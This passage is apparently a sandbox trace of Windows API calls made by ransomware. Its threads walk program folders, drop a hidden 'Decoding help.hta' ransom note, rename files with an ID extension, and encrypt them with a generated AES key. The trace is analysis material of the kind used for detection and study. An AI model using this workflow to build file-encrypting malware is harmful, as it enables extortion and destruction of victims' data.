lpString2=".") returned 0 [0054.457] FindNextFileW (in: hFindFile=0x5e2c30, lpFindFileData=0xf70fd30 | out: lpFindFileData=0xf70fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x29272c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x29272c20, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.457] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0054.457] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0054.457] FindNextFileW (in: hFindFile=0x5e2c30, lpFindFileData=0xf70fd30 | out: lpFindFileData=0xf70fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59d2100, ftCreationTime.dwHighDateTime=0x1d0a100, ftLastAccessTime.dwLowDateTime=0x59d2100, ftLastAccessTime.dwHighDateTime=0x1d0a100, ftLastWriteTime.dwLowDateTime=0x59d2100, ftLastWriteTime.dwHighDateTime=0x1d0a100, nFileSizeHigh=0x0, nFileSizeLow=0xf7139, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows6.1-KB2999226-x64.msu", cAlternateFileName="WINDOW~1.MSU")) returned 1 [0054.457] lstrcpyW (in: lpString1=0x10980878, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\*.*" [0054.457] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\*.*") returned 96 [0054.457] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Decoding help.hta" [0054.457] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Decoding help.hta" (normalized: "c:\\programdata\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\patch\\x64\\decoding help.hta")) returned 0xffffffff [0054.457] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Decoding help.hta" (normalized: "c:\\programdata\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\patch\\x64\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0055.460] WriteFile (in: hFile=0x4c8, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xf70fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xf70fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.294] CloseHandle (hObject=0x4c8) returned 1 [0058.294] SetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.294] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Windows6.1-KB2999226-x64.msu") returned -1 [0058.294] lstrlenW (lpString="Windows6.1-KB2999226-x64.msu") returned 28 [0058.294] lstrcmpiW (lpString1="[ID]", lpString2=".msu") returned 1 [0058.294] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\*.*" [0058.294] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\*.*") returned 96 [0058.294] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\", lpString2="Windows6.1-KB2999226-x64.msu" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu") returned="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu" [0058.295] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu") returned="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu" [0058.295] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu.[ID]g9uZrLhJaygpwRm1[ID]" [0058.295] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu" (normalized: "c:\\programdata\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\patch\\x64\\windows6.1-kb2999226-x64.msu"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\patch\\x64\\windows6.1-kb2999226-x64.msu.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.295] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\patch\\x64\\windows6.1-kb2999226-x64.msu.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0058.295] CreateFileMappingA (hFile=0x4c8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xa80 [0058.296] CryptAcquireContextA (in: phProv=0xf70fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xf70fcec*=0x3449b50) returned 1 [0060.194] CryptGenKey (in: hProv=0x3449b50, Algid=0x6610, dwFlags=0x1, phKey=0xf70fce8 | out: phKey=0xf70fce8*=0x42cf6d8) returned 1 [0060.194] CryptExportKey (in: hKey=0x42cf6d8, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xf70fbe4, pdwDataLen=0xf70fce4 | out: pbData=0xf70fbe4*, pdwDataLen=0xf70fce4*=0x2c) returned 1 [0060.194] MapViewOfFile (hFileMappingObject=0xa80, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xf7120) returned 0xd290000 [0063.880] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xf70fbe4*, pdwDataLen=0xf70fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xf70fbe4*, pdwDataLen=0xf70fcf8*=0x100) returned 1 [0063.880] CryptEncrypt (hKey=0x42cf6d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0xd290000, pdwDataLen=0xf70fce4*=0xf7120, dwBufLen=0xf7120) Thread: id = 679 os_tid = 0xee4 [0054.458] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\*.*", lpFindFileData=0x7b2fd30 | out: lpFindFileData=0x7b2fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51c2ab50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10fbbe98 [0062.546] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0062.546] FindNextFileW (in: hFindFile=0x10fbbe98, lpFindFileData=0x7b2fd30 | out: lpFindFileData=0x7b2fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51c2ab50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.547] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0062.547] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0062.547] FindNextFileW (in: hFindFile=0x10fbbe98, lpFindFileData=0x7b2fd30 | out: lpFindFileData=0x7b2fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecb88f00, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x603362b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xecb88f00, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0xe1ba, dwReserved0=0x0, dwReserved1=0x0, cFileName="CAPSULES.ELM", cAlternateFileName="")) returned 1 Thread: id = 680 os_tid = 0xee8 [0054.458] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\*.*", lpFindFileData=0x157dfd30 | out: lpFindFileData=0x157dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51c50cb0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10fbbe58 [0062.546] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0062.546] FindNextFileW (in: hFindFile=0x10fbbe58, lpFindFileData=0x157dfd30 | out: lpFindFileData=0x157dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51c50cb0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.546] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0062.546] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0062.546] FindNextFileW (in: hFindFile=0x10fbbe58, lpFindFileData=0x157dfd30 | out: lpFindFileData=0x157dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xede9bc00, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x51c50cb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xede9bc00, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0xba44, dwReserved0=0x0, dwReserved1=0x0, cFileName="CASCADE.ELM", cAlternateFileName="")) returned 1 Thread: id = 681 os_tid = 0xeec [0054.458] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\*.*", lpFindFileData=0x15d1fd30 | out: lpFindFileData=0x15d1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51cc30d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10fbbe18 [0062.545] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0062.545] FindNextFileW (in: hFindFile=0x10fbbe18, lpFindFileData=0x15d1fd30 | out: lpFindFileData=0x15d1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51cc30d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.545] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0062.545] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0062.545] FindNextFileW (in: hFindFile=0x10fbbe18, lpFindFileData=0x15d1fd30 | out: lpFindFileData=0x15d1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf17d4300, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x6041aaf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf17d4300, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0xd613, dwReserved0=0x0, dwReserved1=0x0, cFileName="COMPASS.ELM", cAlternateFileName="")) returned 1 Thread: id = 682 os_tid = 0xef0 [0054.458] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\*.*", lpFindFileData=0x15e1fd30 | out: lpFindFileData=0x15e1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51cc30d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10fbcb18 [0059.537] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.537] FindNextFileW (in: hFindFile=0x10fbcb18, lpFindFileData=0x15e1fd30 | out: lpFindFileData=0x15e1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51cc30d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.537] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0059.537] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.537] FindNextFileW (in: hFindFile=0x10fbcb18, lpFindFileData=0x15e1fd30 | out: lpFindFileData=0x15e1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2ae7000, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x51cc30d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf2ae7000, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0xb1d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="CONCRETE.ELM", cAlternateFileName="")) returned 1 [0059.537] lstrcpyW (in: lpString1=0x2ab190a0, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\*.*" [0059.537] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\*.*") returned 72 [0059.537] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\Decoding help.hta" [0059.537] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\decoding help.hta")) returned 0xffffffff [0059.537] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xebc [0062.539] WriteFile (in: hFile=0xebc, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x15e1fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x15e1fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0062.540] CloseHandle (hObject=0xebc) returned 1 [0062.540] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\Decoding help.hta", dwFileAttributes=0x1) returned 1 Thread: id = 683 os_tid = 0xef4 [0054.458] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\*.*", lpFindFileData=0x1685fd30 | out: lpFindFileData=0x1685fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6073a7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6073a7d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10fbbdd8 [0062.545] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0062.545] FindNextFileW (in: hFindFile=0x10fbbdd8, lpFindFileData=0x1685fd30 | out: lpFindFileData=0x1685fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6073a7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6073a7d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.545] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0062.545] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0062.545] FindNextFileW (in: hFindFile=0x10fbbdd8, lpFindFileData=0x1685fd30 | out: lpFindFileData=0x1685fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf641f700, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x6073a7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf641f700, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0x116dc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DEEPBLUE.ELM", cAlternateFileName="")) returned 1 Thread: id = 684 os_tid = 0xef8 [0054.459] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\*.*", lpFindFileData=0x173dfd30 | out: lpFindFileData=0x173dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x60891430, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x60891430, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10fbbd98 [0062.544] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0062.544] FindNextFileW (in: hFindFile=0x10fbbd98, lpFindFileData=0x173dfd30 | out: lpFindFileData=0x173dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x60891430, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x60891430, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.544] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0062.544] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0062.544] FindNextFileW (in: hFindFile=0x10fbbd98, lpFindFileData=0x173dfd30 | out: lpFindFileData=0x173dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf8a45100, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x60891430, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf8a45100, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0xb0ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="ECHO.ELM", cAlternateFileName="")) returned 1 Thread: id = 685 os_tid = 0xefc [0054.459] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\*.*", lpFindFileData=0xf58fd30 | out: lpFindFileData=0xf58fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e3fe90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da678 [0062.543] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0062.544] FindNextFileW (in: hFindFile=0x5da678, lpFindFileData=0xf58fd30 | out: lpFindFileData=0xf58fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e3fe90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.544] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0062.544] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0062.544] FindNextFileW (in: hFindFile=0x5da678, lpFindFileData=0xf58fd30 | out: lpFindFileData=0xf58fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9d57e00, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x51eb22b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf9d57e00, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0x1cf31, dwReserved0=0x0, dwReserved1=0x0, cFileName="ECLIPSE.ELM", cAlternateFileName="")) returned 1 Thread: id = 686 os_tid = 0xf00 [0054.459] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\*.*", lpFindFileData=0x17b1fd30 | out: lpFindFileData=0x17b1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51f70990, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42cf7d8 [0062.543] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0062.543] FindNextFileW (in: hFindFile=0x42cf7d8, lpFindFileData=0x17b1fd30 | out: lpFindFileData=0x17b1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51f70990, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.543] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0062.543] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0062.543] FindNextFileW (in: hFindFile=0x42cf7d8, lpFindFileData=0x17b1fd30 | out: lpFindFileData=0x17b1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb06ab00, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x51f70990, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfb06ab00, ftLastWriteTime.dwHighDateTime=0x1cab7f1, 